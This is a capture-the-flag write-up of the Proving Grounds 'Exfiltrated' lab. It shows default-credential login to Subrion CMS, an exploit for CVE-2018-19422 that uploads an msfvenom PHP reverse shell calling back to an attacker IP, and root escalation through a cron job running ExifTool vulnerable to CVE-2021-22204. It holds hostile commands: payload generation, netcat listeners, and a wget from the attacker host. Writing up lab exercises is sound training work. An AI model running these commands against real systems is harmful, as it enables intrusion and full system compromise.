← Back to Writeups
Exfiltrated icon

Exfiltrated

Proving Grounds Easy Linux October 28, 2025
subrion-cms authenticated-rce exiftool cron-jobs cve-2018-19422 cve-2021-22204

Summary

TL;DR Exfiltrated is an Easy Linux box featuring a Subrion CMS installation vulnerable to authenticated RCE (CVE-2018-19422). After gaining initial access with default credentials, the privilege escalation path involves exploiting a cron job that processes images with a vulnerable version of ExifTool (CVE-2021-22204), allowing arbitrary command execution as root through malicious image metadata.

Key Vulnerabilities:

  • Subrion CMS with default credentials (admin:admin)
  • Authenticated RCE in Subrion CMS (CVE-2018-19422)
  • ExifTool arbitrary code execution (CVE-2021-22204)
  • Cron job processing user-uploaded images with vulnerable ExifTool

Enumeration

Nmap Scan

Initial scan:

nmap -vv -T5 -p- 192.168.x.x

nmap -vv -T5 -p22,80 -sC -sV 192.168.x.x

Results:

Port Service TCP/UDP
22 SSH TCP
80 HTTP TCP

Key findings:

  • Limited attack surface with only SSH and HTTP exposed
  • Web application requires enumeration

Web Enumeration

Step 1: Accessing the web application immediately reveals Subrion CMS

Pasted image 20251028180838.png

Subrion CMS Subrion is an open-source content management system built with PHP. Older versions contain multiple vulnerabilities including authenticated remote code execution through file upload and template manipulation.

Pasted image 20251028180910.png

Step 2: Test default credentials

Username: admin
Password: admin

Result: ✅ Successfully authenticated with default credentials!

Initial Foothold

Vulnerability Discovery

Vulnerability: CVE-2018-19422 - Subrion CMS Authenticated RCE

CVE-2018-19422 An authenticated remote code execution vulnerability in Subrion CMS that allows attackers to upload malicious files or inject PHP code through template manipulation. Multiple exploitation methods exist, including file upload and eval() injection.

Exploitation Attempts

Attempt 1: Manual exploitation following GitHub issue #909

  • Added eval() hook to index.php
  • Successfully executed commands
  • Method proved ineffective for obtaining full shell

Attempt 2: Various automated exploits

  • Some exploits provided only pseudo-shells
  • Escalation to interactive shell proved difficult
  • Needed better exploitation method

Attempt 3 (Success): File upload RCE exploit

Found excellent exploit by Drew-Alleman that supports file upload.

Step 1: Run the exploit to upload PHP reverse shell

# Generate PHP reverse shell
msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=4444 -f raw > shell.php

# Use exploit to upload
python3 exploit.py --url http://192.168.x.x --user admin --pass admin --file shell.php

Step 2: Start listener and trigger shell

# Start listener
nc -lvnp 4444

# Access uploaded shell through browser
curl http://192.168.x.x/uploads/shell.php

Pasted image 20251028181320.png

Shell Access Successfully obtained reverse shell as www-data

Privilege Escalation

Initial Enumeration Miss

Critical mistake: Failed to properly enumerate cron jobs during initial enumeration.

The discovery: Root cron job at /etc/crontab

Pasted image 20251028181403.png

Pasted image 20251028181425.png

Cron Job Analysis A cron job running as root processes image files from a specific directory using ExifTool. This is a common privilege escalation vector if the ExifTool version is vulnerable, as it processes user-controlled file metadata.

ExifTool Vulnerability

Step 1: Identify ExifTool version

exiftool -ver

Pasted image 20251028181549.png

Step 2: Research ExifTool vulnerabilities

Found CVE-2021-22204 - ExifTool Arbitrary Code Execution

Pasted image 20251028181558.png

CVE-2021-22204 A critical vulnerability in ExifTool versions 7.44 through 12.23 that allows arbitrary code execution through malicious DjVu file metadata. When ExifTool processes a specially crafted image file, it executes embedded commands, leading to complete system compromise if run with elevated privileges.

Step 3: Understand the exploit

The vulnerability works by:

  1. Crafting a DjVu image file with malicious metadata
  2. Embedding a reverse shell payload in the metadata
  3. Uploading the file to a location processed by the cron job
  4. ExifTool executes the payload when processing the file

Exploitation

Found PoC: CVE-2021-22204 ExifTool exploit

Step 1: Clone and prepare the exploit

git clone https://github.com/convisolabs/CVE-2021-22204-exiftool
cd CVE-2021-22204-exiftool

Step 2: Edit the exploit script to add reverse shell details

Pasted image 20251028181922.png

# Modified exploit.py
LHOST = "10.10.14.5"
LPORT = "4445"

Step 3: Generate the malicious image

python3 exploit.py

Pasted image 20251028181723.png

This generates a file named image.jpg with the embedded payload.

Note: The payload isn’t visible in the image itself - it’s embedded in the metadata.

Pasted image 20251028181738.png

Step 4: Upload the malicious image to the target

# On target as www-data
cd /path/to/upload/directory
wget http://10.10.14.5:8000/image.jpg

Pasted image 20251028181940.png

Step 5: Start listener and wait for cron job

# Start listener
nc -lvnp 4445

# Wait for cron job to process the image (usually within a minute)
Root Access Successfully obtained root shell when cron job processed the malicious image

Post-Exploitation

Flags:

  • User: Located in /home/*/local.txt
  • Root: Located in /root/proof.txt

Attack Chain Summary:

  1. Web enumeration reveals Subrion CMS
  2. Default credentials provide authenticated access
  3. CVE-2018-19422 exploited for file upload RCE
  4. Initial shell obtained as www-data
  5. Cron job enumeration reveals root process using ExifTool
  6. ExifTool version identified as vulnerable to CVE-2021-22204
  7. Malicious image crafted with embedded reverse shell
  8. Image uploaded to directory processed by cron
  9. ExifTool executes payload, providing root shell

Key Lessons:

  • Always test default credentials (admin:admin, admin:password, etc.)
  • Multiple exploitation methods exist for the same vulnerability - try different approaches
  • Cron job enumeration is critical for privilege escalation
  • Image processing tools (ExifTool, ImageMagick) are common privilege escalation vectors
  • Metadata exploitation can bypass traditional file upload restrictions
  • Some exploits require modification (IP/port) before use
  • Patience is required for cron-based exploits (wait for scheduled execution)

References

Timeline

graph LR
    A[Nmap Scan] --> B[Web Enum]
    B --> C[Subrion CMS]
    C --> D[Default Creds]
    D --> E[CVE-2018-19422]
    E --> F[File Upload RCE]
    F --> G[www-data Shell]
    G --> H[Cron Enum]
    H --> I[ExifTool Found]
    I --> J[CVE-2021-22204]
    J --> K[Malicious Image]
    K --> L[Root Shell]

Pwned on: 28/10/2025

Difficulty Rating: ⭐⭐⭐ (Requires understanding of metadata exploitation)
Fun Factor: ⭐⭐⭐⭐ (Excellent learning experience with ExifTool CVE)